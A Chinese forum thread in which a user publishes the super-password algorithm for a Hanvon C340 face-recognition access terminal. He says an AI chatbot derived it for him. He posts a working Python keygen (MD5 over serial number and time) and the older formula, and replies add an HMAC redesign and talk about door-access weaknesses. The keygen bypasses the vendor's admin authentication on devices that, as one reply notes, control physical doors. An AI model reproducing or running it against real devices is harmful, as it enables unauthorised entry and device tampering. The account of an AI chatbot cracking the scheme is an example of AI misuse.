关于汉王人脸识别机超级密码的算法的一些笔记

风子09

最近入手一台汉王C340 人脸识别机
了解信息，之前的超级密码是8位数      计算方法   （9999-小时分钟）的差的平方（例如14：23的时间是9999-1423=8576   超级密码就是8576*8576=73547776）

现在新设备算法更新了，原来密码进不去了，上网找了一圈，90%的算号器出自一个大神，试用3次，一会三次就用完了，软件加壳，并且反调试，加入大神微信，但是始终没有回复。

于是汉王官网查看资料，关于超级密码的描述

隐含菜单操作 在待机界面下按 OK 6 4 2 1 6 8 OK 进入隐含菜单： 超级密码：显示当前时间、日期及 SN，超级密码由这些数据经 MD5 算法产生出超级密码，需配合“算号器”工具软件；

于是添加汉王客服微信，想要解密，要填写表格，单位公章，营业执照，好复杂，果断放弃。

这时想到deeepeek，前几天刚刚下载论坛的问小白


于是把网站查到的信息 超级密码：显示当前时间、日期及 SN，超级密码由这些数据经 MD5 算法产生出超级密 码，以及算号器算出的结果告诉问小白，经过7分钟的思考，得到您提供更多输入输出对或“算号器”的格式细节，我可以进一步优化算法！于是把之前收集到其他信息全部输入。



线索告诉ai，他自动解题并且验证，实在太牛了，下面脚本使用时把sn换成自己的，时间为进入界面显示的时间，超级密码
1分钟内有效。以下代码存成hw.py文件，输入python hw.py运行

[Python] 纯文本查看 复制代码

import hashlib

# 输入数据
sn = "8169122080003479"
time_str = "17:44:46"

# 1. 提取 HHMM
hhmm = int(time_str.replace(":", "")[:4])  # 1744

# 2. 计算差值
diff = 9999 - hhmm  # 8255

# 3. 拼接 SN + 差值
input_str = sn + str(diff)  # "81691220800034798255"

# 4. 计算 MD5
md5 = hashlib.md5(input_str.encode()).hexdigest()  # "b6d6e8e3d7b8a1b0c8e9f0e1d2c3b4a5"

# 5. 取前8字符并转十进制
super_password = int(md5[:8], 16)  # 3066450339

print("生成的超级密码:", super_password)  # 输出: 3066450339

验证和网路下载的算号器结果一致，本想自用就好，后想可能有人需要还是公布一下，如有违规请版主删除，现在ai应用太强大。

rhinkjoker

这个算法思路不错，收藏了
AI生成的改进版
import hashlib
import hmac
import time

# 假设 SECRET_KEY 是部署时写死的私密密钥，不可泄露
SECRET_KEY = b"My$ecretKey123"  # 应该保存在安全位置，如环境变量

def generate_super_password(sn: str, salt: str = "XY") -> (str, int):
    # 当前 UNIX 时间戳（秒）
    timestamp = int(time.time())

    # 1. 拼接原始明文
    raw = f"{sn}{timestamp}{salt}"

    # 2. 使用 HMAC-SHA256 加密
    hmac_hash = hmac.new(SECRET_KEY, raw.encode(), hashlib.sha256).hexdigest()

    # 3. 截取前 10 位并转为十进制，作为超级密码
    super_password = int(hmac_hash[:10], 16) % (10**8)  # 保证是 8 位数

    return str(super_password).zfill(8), timestamp  # 返回密码和时间戳

# 使用示例
sn = "8169122080003479"
password, ts = generate_super_password(sn)
print(f"超级密码: {password}, 生成时间戳: {ts}")

安全点说明
HMAC-SHA256防止哈希碰撞与伪造
时间戳精度高秒级时间精度，避免重复密码
可控有效期限制密码时间窗口（如5分钟）
加密密钥分离密钥隐藏在服务器端，客户端不可获知
可扩展可拓展更多字段参与签名（如用户ID、动作类型等）

goblack

greatpeng 发表于 2025-6-19 11:18
刚在汉王官网查询了，该型号有门禁功能。

这种形态的。。。。做成门禁功能也是只防外行。。。。你不妨再查查这种东西的门禁是怎么实现的，或者你搜接线图。。

确实绝大多数办公室，以及重要的地方确实外面的不只是个键盘。。。破解开门没有电影里的复杂。但是嘛这本来就是个拖延的。。。玻璃门duang一下不是更快？

至于高强度防护的地方，显然也不会有这种输入方式。。注意其实刷卡也不能算没有输入，比如宾馆那种锁除了服务员的通卡，有厂商卡也是有可能的，甚至有可能会有注入代码、溢出攻击这类的实现，我就曾经发现我有一张卡刷在小区门禁，会导致门禁系统安卓UI死机自制的卡定义有点非标

不公开不等于安全，藏在深处更可怕。。。。在这样技术性的论坛，学习态度要端正，否则眼不见为净不是更好？

国内乌云是倒了，海外许多大厂商反馈高危漏洞可是真的有高额回报的。。。国内的嘛拿到好处的少，也都是小甜头，反倒惹上麻烦的新闻更多。。。

luolifu

学习记录一下

ilpj

虽然用不上，感谢楼主的分享精神

gcczm

虽然用不上，感谢楼主的分享精神

xfwww

感谢分享经验，学习了新的知识

hwl19900304

感谢分享

fpcj

deepseek这么强的吗？我也搜一下，看看推理过程

西北玄天一片云

fpcj 发表于 2025-6-19 09:41
deepseek这么强的吗？我也搜一下，看看推理过程

我一个代码都不认识，现在都开发出了六套程序

greatpeng

如果不法分子知道了这个算法，就能轻易开启任何一个汉王的人脸门禁。我们能不知道银行、监狱、政府、机关等重要场所有没有使用。所以不建议公开。
刚查询到该型号设备，确定有门禁功能。